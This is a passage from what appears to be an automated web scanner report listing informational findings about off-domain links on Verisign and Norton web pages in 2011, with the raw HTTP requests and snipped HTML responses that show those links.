<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...
<div class="right"><a target="_blank" href="https://cert.webtrust.org/ViewSeal?id=304"><img border="0" src="/rcm/verisign/images/webtrust.gif" style="border:0" title="WebTrust" alt="WebTrust">
...[SNIP]...

14.44. https://trust-center.verisign.com/process/retail/trust_product_selector

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_product_selector

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 41019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...
</script>
<script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...
<div class="right"><a target="_blank" href="https://cert.webtrust.org/ViewSeal?id=304"><img border="0" src="/rcm/verisign/images/webtrust.gif" style="border:0" title="WebTrust" alt="WebTrust">
...[SNIP]...

14.45. http://updatecenter.norton.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://updatecenter.norton.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?NUCLANG=en HTTP/1.1
Host: updatecenter.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 09 Sep 2011 21:46:03 GMT
Connection: close
Content-Length: 25405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir = "ltr">
<head id="ctl00_Head1"><t
...[SNIP]...
<li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=261&origin=nuc">Norton Online Family</a>
...[SNIP]...
<li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=262&origin=nuc">Norton Online Backup</a>
...[SNIP]...
<li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=281&origin=nuc">Norton Management</a>
...[SNIP]...
<li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=263&origin=nuc">Norton Safe Web</a>
...[SNIP]...
<li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=264&origin=nuc">Norton Account</a>
...[SNIP]...
<li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=266&origin=nuc">Norton.com</a>
...[SNIP]...
<li><a href="http://sitedirector.symantec.com/932743328/?SSDCAT=267&oslocale=iso:eng&oslang=iso:eng&plang=en&products=NUC&versions=2.0">Leave Feedback</a>
...[SNIP]...
<li><a href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:ENG&ssdcat=270">Customer Support</a>
...[SNIP]...
<div class="nortonFbLink">
<a target="_blank" href="http://www.facebook.com/Norton"><span class="name">
...[SNIP]...
<div class="socialWidgets">
<iframe class="fbLikeIFrame" src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FNorton&amp;layout=button_count&amp;show_faces=false&amp;width=450&amp;action=like&amp;colorscheme=light&amp;font=&amp;height=21&amp;locale=en_US&amp;ref=NortonUpdateCenter" scrolling="no" frameborder="0" style="border: none;
overflow: hidden; width: 160px; height: 21px;" allowtransparency="true">
</iframe>
...[SNIP]...
<li>
<a target="_blank" href='http://sitedirector.symantec.com/932743328/?oslocale=iso:USA&plang=EN&oslang=iso:ENG&ssdcat=151'>Legal Notices</a>
...[SNIP]...
<li>
<a target="_blank" href='http://sitedirector.symantec.com/932743328/?oslocale=iso:USA&plang=EN&oslang=iso:ENG&ssdcat=150'>Privacy Policy</a>
...[SNIP]...
<li>
<a target="_blank" href='http://sitedirector.symantec.com/932743328/?SSDCAT=267&oslocale=iso:eng&oslang=iso:eng&plang=en&products=NUC&versions=2.0'>Leave Feedback</a>
...[SNIP]...
<li>
<a target="_blank" href='http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=272'>License Agreements</a>
...[SNIP]...
<li><a class="footer-link" id="nof" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=261&origin=nuc">
<span class="footer-tt">
...[SNIP]...
<li><a class="footer-link" id="nobu" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=262&origin=nuc">
<span class="footer-tt">
...[SNIP]...
<li><a class="footer-link" id="nom" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=281&origin=nuc">
<span class="footer-tt">
...[SNIP]...
<li><a class="footer-link" id="safeweb" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=263&origin=nuc">
<span class="footer-tt">
...[SNIP]...
<li><a class="footer-link" id="na" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=264&origin=nuc">
<span class="footer-tt">
...[SNIP]...
<li><a class="footer-link" id="nortondotcom" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=266&origin=nuc">
<span class="footer-tt">
...[SNIP]...

14.46. http://us.norton.com/beta/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /beta/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /beta/index.jsp?inid=us_hho_homepage_hero4_2012beta HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Expires: Fri, 09 Sep 2011 21:47:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:47:30 GMT
Content-Length: 24280
Connection: close
Set-Cookie: JSESSIONID=942CFE17E15760F8032358C3716740F0; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Antivirus Free Software - Spyware Free Protection | Norton Beta Center</title>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&amp;fpage=orderHistory&amp;product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.47. http://us.norton.com/beta/overview.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /beta/overview.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /beta/overview.jsp?pvid=n3605beta&inid=us_hho_homepage_hero4_n360v5beta HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Expires: Fri, 09 Sep 2011 21:47:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:47:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39170

<meta http-equiv="refresh" content="0;url=http://us.norton.com/beta">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Norton Beta Software - Norton 360 Version
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&amp;fpage=orderHistory&amp;product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
<li><a href="http://sitedirector.symantec.com/932743328/?ssdcat=221&lcid=1033&serviceid=181&pname=N360&pversion=5.0&origin=thankyou&env=beta&layout=esd&tooltype=both" target="_blank">Norton Recovery Tools</a>
...[SNIP]...
<div class="cbMrgnBtmMD">Please follow the <a href="http://www.twitter.com/norton_beta" target="_blank">Norton Public Beta Twitter Account</a>
...[SNIP]...
l support on beta version software products. We do, however, value your feedback on features, usability, and bugs. All information submitted is routed through a secure server and is in compliance with <a href="http://www.symantec.com/about/profile/policies/privacy.jsp" target="_blank">Symantec...s Privacy Policy</a>
...[SNIP]...
<div class="promoWdgt"><a href="http://twitter.com/norton_beta"><img src="/content/en/us/home_homeoffice/images/promos/n-beta10-twitter-promo-b.gif" alt="Follow Norton on Twitter" title="Follow Norton on Twitter" class="imgFltTop " width="180" height="90"/>
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.48. http://us.norton.com/norton-utilities/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /norton-utilities/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /norton-utilities/?inid=us_hho_homepage_hero3_nu2011pdpage HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=3501
Date: Fri, 09 Sep 2011 21:47:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 83835

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Registry Cleaners - Computer Startup Programs | Norton Utilities</title>
<me
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&amp;fpage=orderHistory&amp;product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
</div>                
                           
           
               <a href="http://www.symantec.com/norton/products/reviews/index.jsp" target="_blank">Read more reviews</a>
...[SNIP]...
<li><a href="https://www.mynortonaccount.com/amsweb/default.do">Access Norton Account</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.49. http://us.norton.com/nortonlive/spyware-virus-removal.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /nortonlive/spyware-virus-removal.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /nortonlive/spyware-virus-removal.jsp?inid=us_hho_support_topnav1_viruses&risks HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Cache-Control: public, max-age=3123
Date: Fri, 09 Sep 2011 21:47:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36294

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Virus Removal &amp; Malware Removal Service | NortonLive</title>
<meta http-
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&amp;fpage=orderHistory&amp;product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
<noscript>
<img width="1" height="1" style="border:0" src="HTTP://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&amp;ActivityID=138499&amp;ns=1"/>
</noscript>

<img src="http://dm.demdex.net/pixel/19701" width="0" height="0" />
<IMG SRC="http://bp.specificclick.net?pixid=99068597" width="1" height="1" border="0" />
<img src="http://ads.bluelithium.com/pixel?id=1406631&t=2" width="1" height="1" />

<!-- BEGIN NORTON LIVE SERVICES IMPORTS ================================== -->
...[SNIP]...
<li><a href="https://nortonlive.support.com/" id="myAcctBtn" target="_blank">My Account</a>
...[SNIP]...
<p><a href="http://www.symantec.com/norton/support/dtree.jsp?pvid=" target="_blank">Go To Symantec<br/>
...[SNIP]...
</p>

                   
                   <a href="https://www-secure.symantec.com/norton/support/contact/chat/nortonlive.jsp?chatexp=vss" target="_blank" class="replaced" id="chatBtn">Chat With Us</a>
...[SNIP]...
<li><a href="http://www.symantec.com/norton/support/DIY/index.jsp" id="rsrc2" target="_blank">DIY Resources</a>
...[SNIP]...
<td>Each NortonLive Service is subject to acceptance of Symantec&rsquo;s <a href="http://www.symantec.com/content/en/us/about/media/nortonlive_tc.pdf" target="_blank">NortonLive Services Terms &amp; Conditions</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/legal.jsp" title="Legal Notices">Legal Notices</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp" title="License Agreements">License Agreements</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/repository.jsp" title="Repository">Repository</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<li><a href="http://www.symantec.com/enterprise/support/index.jsp" title="Business Support">Business Support</a>
...[SNIP]...
<li><a href="http://www.symantec.com/enterprise/contact_sales.jsp" title="Business Sales">Business Sales</a>
...[SNIP]...
<li><a href="http://www.symantec.com/feedback/contactus.jsp" title="Corporate Information">Corporate Information</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://marchex.voicestar.com/euinc/number-changer.js">
   </script>
...[SNIP]...

14.50. http://us.norton.com/products/charts/comparison.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /products/charts/comparison.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /products/charts/comparison.jsp?pcid=mp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1366
Date: Fri, 09 Sep 2011 21:47:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 73931

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Computer Security Systems | Compare Norton Products</title>
<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&amp;fpage=orderHistory&amp;product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
subscription to receive virus protection and scanning engine updates. Use of this product is subject to acceptance of the Symantec License Agreement included with the product and available for review <a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp">here</a>
...[SNIP]...
eatures may be added, modified, or removed during the service period. Use of each product is subject to acceptance of the Symantec LLicense Agreement included with the product and available for review <a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp">here</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.51. http://us.norton.com/support/DIY/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /support/DIY/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/DIY/index.jsp?inid=us_hho_support_tovnav2_removaltools HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Cache-Control: public, max-age=3436
Date: Fri, 09 Sep 2011 21:47:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35700

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Free Virus Removal | Norton Power Eraser</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&amp;fpage=orderHistory&amp;product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
<noscript>
   <img width="1" height="1" style="border:0" src="HTTP://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&amp;ActivityID=138512&amp;ns=1"/>
</noscript>

<img src="http://dm.demdex.net/pixel/19701" width="0" height="0" />
<IMG SRC="http://bp.specificclick.net?pixid=99068597" width="1" height="1" border="0">
<IMG SRC="http://bp.specificclick.net?pixid=99068597" width="1" height="1" border="0">
<img src="http://ads.bluelithium.com/pixel?id=1406631&t=2" width="1" height="1" />
</div>
...[SNIP]...
<div id="solution_button">
                       <a class="button" id="download_button" onclick="javascript:trackOmnitureEvent(this, 'download_solution')"
                        href="http://liveupdate.symantec.com/upgrade/NPE/1033/NPE.exe" >

                           <span>
...[SNIP]...
<div id="chat_button">
<a class="button" href="https://www-secure.symantec.com/norton/support/contact/chat/nortonlive.jsp?chatexp=vss-diy" target="_blank" id="vss_chat" onclick="javascript:trackOmnitureEvent(this, 'vss_chat_link')">        
<span>
...[SNIP]...
<div id="terms_conditions">
           <a href = "http://www.symantec.com/content/en/us/about/media/nortonlive_tc.pdf" target="_blank" id="ps_terms_conditions"
            onclick="javascript:trackOmnitureEvent(this, 'ps_terms_conditions')">

               <div class="orangearrow">
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/legal.jsp" title="Legal Notices">Legal Notices</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp" title="License Agreements">License Agreements</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/repository.jsp" title="Repository">Repository</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<li><a href="http://www.symantec.com/enterprise/support/index.jsp" title="Business Support">Business Support</a>
...[SNIP]...
<li><a href="http://www.symantec.com/enterprise/contact_sales.jsp" title="Business Sales">Business Sales</a>
...[SNIP]...
<li><a href="http://www.symantec.com/feedback/contactus.jsp" title="Corporate Information">Corporate Information</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.52. http://us.norton.com/support/dtree.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /support/dtree.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/dtree.jsp?pvid= HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-Java-System-Web-Server/7.0
Location: https://www-secure.symantec.com/norton-support/index.jsp?&lg=english&ct=united+states&product=home&version=1&pvid=f-home&entsrc=redirect_pubweb
Content-Type: text/html;charset=utf-8
Content-Length: 38842
Vary: Accept-Encoding
Cache-Control: public, max-age=2709
Date: Fri, 09 Sep 2011 21:47:15 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Norton Product Support ... Technical Issues | Order Status | Rebates | Norton Support</title>
<meta http-equiv="Con
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&amp;fpage=orderHistory&amp;product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
<div class ="quicklink_item">
           <a href="https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN" target="_blank" onclick="javascript:trackCustomLink(this, 'order_status')">
